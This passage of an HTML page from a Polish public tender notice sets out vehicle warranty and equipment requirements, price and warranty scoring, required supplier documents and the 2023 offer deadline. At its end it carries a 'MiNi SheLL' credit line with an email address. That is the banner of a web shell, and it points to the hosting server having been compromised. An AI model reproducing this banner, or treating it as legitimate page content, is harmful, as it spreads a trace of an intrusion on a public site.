pojazdu.<br/>3. Gwarancja na zabudowę minimum 24 miesiące<br/>4. Gwarancja na podwozie minimum 24 miesięcy<br/>5. Książka gwarancyjna z harmonogramem przeglądów.<br/>6. Wykonawca w ramach dostawy zobowiązany będzie do przeszkolenia w terminie wskazanym przez Zamawiającego,<br/>pracowników w zakresie budowy i obsługi samochodu oraz wystawi dokumenty potwierdzające ukończenie szkolenia.<br/>7. Wykonawca wykona projekt z danymi adresowymi Zamawiającego oraz logiem (projekt musi zostać zaakceptowany<br/>przez Zamawiającego) i oklei drzwi z dwóch stron zamawianego samochodu, naklejka musi być odporna na warunki<br/>atmosferyczne oraz mieć wymiary min.60cmx40cm<br/>8. Zamawiający dostarczy Wykonawcy po wybraniu oferty czołownicę pod pług wraz z okablowaniem. Wykonawca<br/>zobowiązuje się fabrycznie zamontować na stałe czołownice wraz z niezbędnym okablowaniem na samochodzie, wymienić<br/>zderzak na dzielony, zamontować tablicę rejestracyjną w widocznym miejscu i udzielić gwarancję na minimum 24 miesiące. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34130000-7 - Pojazdy silnikowe do transportu towarów</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty będą oceniane przez Zamawiającego przy zastosowaniu następujących kryteriów:<br/>XIII.1.2 Cena całkowita wykonania zamówienia – 60 % - 60 punktów.<br/>XIII.2 Kryteria poza cenowe :<br/>Udzielenie gwarancji i rękojmi na przynajmniej na 24 miesięcy i mniej niż 36 miesięcy – 0 %.<br/>Udzielenie gwarancji i rękojmi przynajmniej na 36 miesięcy – 40 %.<br/>XIII.3 We wszystkich kryteriach %=pkt.<br/>XIII.4 Zobowiązanie wynikające z kryteriów poza cenowych zostaną wpisane do treści umowy.<br/>XIII. 5 Najkrótszy wymagany przez Zamawiającego okres gwarancji i rękojmi wynosi 24 miesięcy, oferta z gwarancją i rękojmią na<br/>okres krótszy niż 24mies. zostanie odrzucona jako niezgodna z wymaganiami SWZ.<br/>XIII.6 Aby uzyskać 40 punktów z drugiego kryterium wystarczy zadeklarować nie mniej niż 36 miesięcy.<br/>XIII.7 Za okres dłuższy niż 36 miesięcy nie przyzna się więcej niż 40 punktów<br/>XIII.8 Do obliczania punktacji będzie się uwzględniać wyłącznie oferty nie podlegające odrzuceniu, złożone przez oferentów nie<br/>podlegających wykluczeniu.<br/>XIII.9 Cena wykonania zamówienia – obejmuje całkowitą do zapłaty przez zamawiającego cenę brutto tytułem wykonania zadania z<br/>uwzględnieniem wszystkich narzutów i opłat. Oferta z najniższą ceną otrzyma maksymalną ilość punktów = Pc - pkt w kryterium 1 -<br/>cenowym zgodnie z wzorem: Punkty = [C min / C bad] * Pc (60).<br/>C min - najniższa całkowita cena ofertowa brutto spośród ofert badanych.<br/>C bad - cena całkowita oferty badanej brutto.<br/>XIII.10 Jeżeli złożono ofertę, której wybór prowadziłby do powstania u zamawiającego obowiązku podatkowego zgodnie z<br/>przepisami o podatku od towarów i usług, do ceny najkorzystniejszej oferty lub oferty z najniższą ceną dolicza się podatek od<br/>towarów i usług, który zamawiający miałby obowiązek rozliczyć zgodnie z tymi przepisami.<br/>XIII.11 Jako najkorzystniejszą wybierze się ofertę, która zdobędzie największą łączną liczbę punktów z wszystkich kryteriów, punkty<br/>będą liczone z dokładnością do dwóch miejsc po przecinku, jeśli to nie wystarczy do wskazania najkorzystniejszej oferty będzie się<br/>zwiększać dokładność o kolejne miejsca po przecinku. W przypadku, gdy oferty uzyskają identyczną punktację we wszystkich<br/>kryteriach to do wyboru najkorzystniejszej zastosuje się postanowienia ustawy pzp.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Udzielenie gwarancji i rękojmi przynajmniej na 36 miesięcy – 40 %.</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a) Aktualne na dzień<br/>składania ofert oświadczenie o spełnianiu warunków udziału w postępowaniu oraz o braku podstaw do wykluczenia z postępowania<br/>– zgodnie z Załącznikiem nr 4 do SWZ. Informacje zawarte w oświadczeniu stanowią potwierdzenie, że Wykonawca nie podlega<br/>wykluczeniu w postępowaniu.<br/>b) Zobowiązanie innego podmiotu, o którym mowa w pkt VII.5 SWZ - zał. 7 do SWZ (jeżeli dotyczy);<br/>Następnie:<br/>VII. 3 Zamawiający wzywa wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie<br/>krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, aktualnych na dzień ich złożenia, tj.:<br/>VII.3.1 Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, z innym wykonawcą, który złożył odrębną ofertę,<br/>ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy<br/>kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o<br/>dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – załącznik<br/>nr 4 do SWZ.<br/>VII.3.2. Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji<br/>i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed<br/>jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji. Jeżeli wykonawca ma siedzibę lub miejsce<br/>zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast odpisu albo informacji<br/>z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, składa dokument lubdokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające ,że: nie otwarto jego<br/>likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu<br/>z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z<br/>podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury. Dokumenty, powinny być wystawione nie<br/>wcześniej niż 3 miesiące przed ich złożeniem.<br/>Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa wyżej,<br/>zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze<br/>wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone<br/>pod przysięgą, lub, jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod<br/>przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub<br/>gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy.<br/>VII. 4 Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli:<br/>VII.4.1 Może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych,<br/>w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r.<br/>o informatyzacji działalności podmiotów realizujących zadania publiczne, o ile<br/>wykonawca wskazał w oświadczeniu, o którym mowa w art. 125 ust. 1 p.z.p dane umożliwiające dostęp do tych środków;<br/>VII.4.2. Podmiotowym środkiem dowodowym jest oświadczenie, którego treść odpowiada zakresowi oświadczenia, o którym mowa w<br/>art. 125 ust. 1.<br/>Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które zamawiający posiada, jeżeli wykonawca<br/>wskaże te środki oraz potwierdzi ich prawidłowość i aktualność.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-09-06 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-09-06 13:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com